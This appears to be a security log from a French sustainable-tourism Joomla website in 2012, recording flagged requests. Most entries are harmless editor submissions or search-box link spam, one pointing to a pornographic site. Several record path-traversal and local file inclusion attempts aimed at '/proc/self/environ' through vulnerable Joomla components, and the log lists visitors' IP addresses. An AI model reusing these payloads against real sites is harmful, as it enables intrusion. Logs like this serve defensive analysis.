justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:40:24 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:41:00 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:41:22 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:42:29 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:46:34 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-08 16:16:51 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 IP: 188.141.176.15 USER: visitor REQUEST: cf_4=Je g&Atilde;&uml;re des g&Atilde;&reg;tes d\'h&Atilde;&acute;tes 3 &Atilde;&copy;toiles au P PAR: cf_4 2012-03-08 16:20:51 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11 IP: 188.141.176.15 USER: visitor REQUEST: cf_4=Je g&Atilde;&uml;re des g&Atilde;&reg;tes d\'h&Atilde;&acute;tes 3 &Atilde;&copy;toiles au P PAR: cf_4 2012-03-09 20:10:22 USER_AGENT: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.51 (KHTML, like Gecko; Google Web Preview) Chrome/12.0.742 Safari/534.51 IP: 76.71.171.90 USER: visitor REQUEST: option=com_content PAR: /actualite/marketing-touristique/1117-communication-virale-la-campagne-orignale-de-loffice-du-tourisme-australienne.htmlhttp://www.tourisme-durable.org/index.php?option=com_content&view=article&id=1117:communication-virale-la-campagne-orignale-de-loffice-du-tourisme-australienne&catid=3:marketing-touristique&Itemid=735 2012-03-10 17:13:39 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=jodloupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.gkskbxaxnb.com\&quot;&gt;itpdm PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=jodloupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.gkskbxaxnb.com%22%3Eitpdmekxyd%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.nomkpistpo.com%5Dfuxwccfhhh%5B%2Furl%5D%2C+http%3A%2F%2Fwww.yroobgsbpl.com+itpdmekxyd&submit_search=Recherche 2012-03-11 04:42:56 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=pxrgcupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.kbhrpaoakn.com\&quot;&gt;xxwyy PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=pxrgcupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.kbhrpaoakn.com%22%3Exxwyylnlkt%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.myjcvsfaax.com%5Dcpgevmatdk%5B%2Furl%5D%2C+http%3A%2F%2Fwww.stclprwuqm.com+xxwyylnlkt&submit_search=Recherche 2012-03-11 18:09:36 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=wxiftupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.rphvumqudf.com\&quot;&gt;kicuo PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=wxiftupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.rphvumqudf.com%22%3Ekicuopdybh%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.faahvebvfi.com%5Dwdeguvjxun%5B%2Furl%5D%2C+http%3A%2F%2Fwww.uleadbpgee.com+kicuopdybh&submit_search=Recherche 2012-03-11 19:34:02 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=wxhwsupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.jiadxzoect.com\&quot;&gt;ysnpb PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=wxhwsupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.jiadxzoect.com%22%3Eysnpbwslmv%3C%2Fa%3E+&submit_search=Recherche 2012-03-15 02:54:37 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=kvffaupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.ofidtmfrdi.com\&quot;&gt;zsasx PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=kvffaupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.ofidtmfrdi.com%22%3Ezsasxvedqh%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.etevpuilyv.com%5Dpsihwekyvz%5B%2Furl%5D%2C+http%3A%2F%2Fwww.fcsylbhqbh.com+zsasxvedqh&submit_search=Recherche 2012-03-15 13:38:19 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=utcsyupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.moeqpuvcht.com\&quot;&gt;skqwt PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=utcsyupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.moeqpuvcht.com%22%3Eskqwttktko%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.nxzunndunc.com%5Datpjsckuqw%5B%2Furl%5D%2C+http%3A%2F%2Fwww.evkoillmhh.com+skqwttktko&submit_search=Recherche 2012-03-15 19:47:44 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=cqcygupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.ofnebxzelg.com\&quot;&gt;wbphn PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=cqcygupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.ofnebxzelg.com%22%3Ewbphnhvnqr%3C%2Fa%3E+&submit_search=Recherche 2012-03-22 19:34:24 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.233 USER: visitor REQUEST: cp_text_search=asyogupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.scubxgicas.com\&quot;&gt;alaoe PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=asyogupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.scubxgicas.com%22%3Ealaoemhtyg%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.exgpovcfda.com%5Dsnycoratgt%5B%2Furl%5D%2C+http%3A%2F%2Fwww.hhjupugwfa.com+alaoemhtyg&submit_search=Recherche 2012-03-23 06:52:30 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=jekkjupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.idupvfjcxc.com\&quot;&gt;hzvdk PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=jekkjupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.idupvfjcxc.com%22%3Ehzvdknpbys%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.nvpazjffsa.com%5Dbgdttgekps%5B%2Furl%5D%2C+http%3A%2F%2Fwww.bnalxdtkxd.com+hzvdknpbys&submit_search=Recherche 2012-03-23 23:20:06 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.233 USER: visitor REQUEST: cp_text_search=rxawfupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.uotmxbimxu.com\&quot;&gt;jmfqx PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=rxawfupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.uotmxbimxu.com%22%3Ejmfqxtkjwz%3C%2Fa%3E+&submit_search=Recherche 2012-03-25 12:02:22 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.233 USER: visitor REQUEST: cp_text_search=piqqoupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.avyhpkigad.com\&quot;&gt;ixujx PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=piqqoupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.avyhpkigad.com%22%3Eixujxytdlb%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.hpghukbmjs.com%5Drqiwxvztof%5B%2Furl%5D%2C+http%3A%2F%2Fwww.veiialkwio.com+ixujxytdlb&submit_search=Recherche 2012-04-02 15:03:23 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 83.205.191.233 USER: visitor REQUEST: brand=TSEH PAR: /actualite/production-touristique/606-marketing-le-portrait-robot-du-touriste-durable.htmlhttp://www.google.fr/ig?brand=TSEH&bmod=TSEH&aig=0&reason=1 2012-04-06 17:12:06 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Un amoureux des arbres &lt;/s PAR: t33 2012-04-06 17:20:24 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Un amoureux des arbres &lt;/s PAR: t33 2012-04-06 17:20:57 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Un amoureux des arbres &lt;/s PAR: t33 2012-04-06 17:22:19 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Un amoureux des arbres &lt;/s PAR: t33 2012-04-11 10:11:48 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:12:22 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:12:52 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:13:09 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:13:21 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:25:53 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:26:37 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:27:02 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-11 10:28:36 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Le parcours d&acirc;€™un comb PAR: t33 2012-04-25 13:04:10 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=efomyupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.rfragbdzji.com\&quot;&gt;igpsz PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=efomyupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.rfragbdzji.com%22%3Eigpszuxgqc%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.drmymxctsy.com%5Ddqnuaraemv%5B%2Furl%5D%2C+http%3A%2F%2Fwww.ohdrdnluch.com+igpszuxgqc&submit_search=Recherche 2012-04-26 00:57:29 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=dawnfupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.mhjqtmwtjo.com\&quot;&gt;mmdbt PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=dawnfupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.mhjqtmwtjo.com%22%3Emmdbtophnd%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.riesypuiny.com%5Dkcfchllwis%5B%2Furl%5D%2C+http%3A%2F%2Fwww.wrocuxgtdx.com+mmdbtophnd&submit_search=Recherche 2012-04-26 15:20:40 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 188.132.184.64 USER: visitor REQUEST: option=com_ccnewsletter PAR: //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../proc/self/environ%0000 2012-04-26 17:24:12 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=yjwcdupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.fclrxvibld.com\&quot;&gt;slpic PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=yjwcdupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.fclrxvibld.com%22%3Eslpicofoal%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.knwjjrmemg.com%5Daseuvawtxy%5B%2Furl%5D%2C+http%3A%2F%2Fwww.qyjliukeai.com+slpicofoal&submit_search=Recherche 2012-04-26 19:54:22 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=medjxupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.moehwxvwps.com\&quot;&gt;dcixs PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=medjxupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.moehwxvwps.com%22%3Edcixsgvnnq%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.bmvhpuhftx.com%5Dnjuwbkygmm%5B%2Furl%5D%2C+http%3A%2F%2Fwww.gkriyajson.com+dcixsgvnnq&submit_search=Recherche 2012-04-27 10:44:49 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=mbcakupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.wcbvulmbcv.com\&quot;&gt;mcvxv PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=mbcakupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.wcbvulmbcv.com%22%3Emcvxvgeopl%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.ugtpfeptaj.com%5Dpkmlaoroys%5B%2Furl%5D%2C+http%3A%2F%2Fwww.wabrwbzapc.com+mcvxvgeopl&submit_search=Recherche 2012-04-28 13:25:37 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=axewnupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.wwwyvtldgc.com\&quot;&gt;ysrvs PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=axewnupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.wwwyvtldgc.com%22%3Eysrvsrkylo%3C%2Fa%3E+&submit_search=Recherche 2012-04-29 04:21:06 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=hikqcupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.rbrfqbjrdq.com\&quot;&gt;gzwlh PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=hikqcupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.rbrfqbjrdq.com%22%3Egzwlhfdagz%3C%2Fa%3E+&submit_search=Recherche 2012-05-04 10:19:56 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 80.78.243.24 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../proc/self/environ%0000 2012-05-04 10:19:57 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 80.78.243.24 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../proc/self/environ%0000 2012-05-04 10:19:57 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 80.78.243.24 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../proc/self/environ%0000 2012-05-06 10:47:16 USER_AGENT: IP: 107.22.172.65 USER: visitor REQUEST: option=com_acymailing PAR: http://www.tourisme-durable.org/index.php?option=com_acymailing&ctrl=archive&task=view&mailid=43&key=eeffad98d04f652c37c429f094d4b7cb&subid=1302-b96b00d303bf3727761aa0151d04ad65 2012-05-21 12:33:34 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:12.0) Gecko/20100101 Firefox/12.0 IP: 86.220.21.48 USER: visitor REQUEST: editor_body=&lt;table style=\&quot;margin: auto; padding-left: 20px; padding-right: 20px; width: PAR: editor_body 2012-05-23 07:36:32 USER_AGENT: IP: 107.22.172.65 USER: visitor REQUEST: option=com_content PAR: http://www.tourisme-durable.org/index.php?option=com_content&view=article&id=1302:chamonix-mont-blanc-versant-durable-rencontre-autour-du-tourisme-de-demain&catid=116:rencontres-salons-trophees&Itemid=739 2012-05-31 02:59:24 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.230 USER: visitor REQUEST: cp_text_search=&lt;a href=\&quot;http://pornsks4all.com/\&quot;&gt;upvsjtnf.evsbcmf&lt;/a&gt;, $R PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=%3Ca+href%3D%22http%3A%2F%2Fpornsks4all.com%2F%22%3Eupvsjtnf.evsbcmf%3C%2Fa%3E%2C+%24RandomStr%2C+%5Burl%3Dhttp%3A%2F%2Fpornsks4all.com%2F%5Dupvsjtnf.evsbcmf%5B%2Furl%5D%2C+%24RandomStr%2C+http%3A%2F%2Fpornsks4all.com%2F+upvsjtnf.evsbcmf%2C+%24RandomStr.&submit_search=Recherche 2012-05-31 07:06:33 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=oxjpeupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.fwzjhjkdop.com\&quot;&gt;hrfgs PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=oxjpeupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.fwzjhjkdop.com%22%3Ehrfgsucnka%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.pxjnecqtlj.com%5Dbiudcggejp%5B%2Furl%5D%2C+http%3A%2F%2Fwww.bxzosskirr.com+hrfgsucnka&submit_search=Recherche 2012-06-01 15:10:47 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=szmdxupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.etsmdbojyi.com\&quot;&gt;yqpnh PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=szmdxupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.etsmdbojyi.com%22%3Eyqpnhujuux%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.yjadcroxub.com%5Dwlenwtazih%5B%2Furl%5D%2C+http%3A%2F%2Fwww.saftmavvzt.com+yqpnhujuux&submit_search=Recherche 2012-06-02 06:17:28 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.231 USER: visitor REQUEST: cp_text_search=unsxbupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.oezeankero.com\&quot;&gt;lxddc PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=unsxbupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.oezeankero.com%22%3Elxddcdnwsa%3C%2Fa%3E+&submit_search=Recherche 2012-06-03 05:11:18 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=rbbsvupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.hpdhiskfko.com\&quot;&gt;ftnnk PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=rbbsvupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.hpdhiskfko.com%22%3Eftnnkrlxhz%3C%2Fa%3E+&submit_search=Recherche 2012-06-04 09:36:40 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 IP: 78.251.156.181 USER: visitor REQUEST: idOffre=cc08c3238830c PAR: 